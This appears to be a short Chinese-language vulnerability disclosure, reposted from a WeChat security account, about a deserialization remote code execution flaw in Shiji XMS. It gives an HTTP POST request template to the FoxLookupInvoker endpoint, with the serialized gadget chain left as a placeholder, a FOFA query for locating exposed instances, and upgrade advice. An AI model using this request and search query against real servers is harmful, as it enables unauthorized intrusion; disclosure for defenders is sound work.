漏洞详情
影响版本
全版本
漏洞复现
payload
POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
{{hexdec(cb18x的序列化链)}
fofa语法
app
=
"shiji-西软云XMS"
修复建议
升级至安全版本
原文始发于微信公众号(棉花糖网络安全圈):西软云XMS 反序列化RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论